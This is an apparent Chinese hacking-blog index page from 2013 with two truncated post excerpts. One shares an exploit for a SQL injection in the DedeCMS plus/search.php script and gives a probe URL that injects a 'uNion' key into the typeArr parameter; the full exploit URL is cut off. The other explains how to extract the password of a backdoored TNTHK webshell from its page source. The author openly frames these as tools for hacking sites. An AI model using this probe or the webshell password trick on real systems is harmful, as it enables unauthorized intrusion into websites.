[通杀]dedecms plus/search.php 注入漏洞利用EXP

分类:安全 | 2013-01-23 | 撸过 3,756 次
5人扯谈

哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。

既然已经发出来了,我就把我自己搞的exp发下吧。。唉。

我一般是这样测试的:

提交

https://webshell.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a

 

看结果如果提示

Safe Alert: Request Error step 2 !

那么直接用下面的exp

https://webshell.cc/pl[......]

继续阅读

TNTHK小组内部版webshell密码破解

分类:安全 | 2013-01-3 | 撸过 1,289 次
3人扯谈

下面简单的揭露下怎么获取webshell后门密码

1. 在password登陆框 随便输入一错误密码,提示error,如图:


2. 然后右键查看源文件,搜索[password],font 后面跟的就是shell的密码,测试一下


3. 按照上面的方法,貌似通杀…